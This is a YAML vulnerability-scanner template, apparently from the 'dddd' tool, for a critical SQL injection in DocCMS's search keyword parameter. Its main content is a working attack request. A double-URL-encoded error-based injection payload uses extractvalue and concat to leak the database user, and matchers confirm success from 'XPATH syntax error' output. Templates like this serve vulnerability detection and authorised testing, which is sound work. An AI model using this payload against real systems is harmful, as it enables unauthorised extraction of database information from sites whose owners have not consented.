dddd/common/config/pocs/doc-cms-keyword-sql-injection.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

26 lines
1.2 KiB
YAML

id: doc-cms-keyword-sql-injection
info:
name: DocCMS keyword SQL Injection Vulnerability
author: daffainfo
severity: critical
description: DocCMS keyword parameter has a SQL injection vulnerability, attackers can get database information through the vulnerability app="Doccms"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/DocCMS%20keyword%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
http:
- method: GET
path:
- "{{BaseURL}}/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "数据库错误:"
- "XPATH syntax error:"
condition: and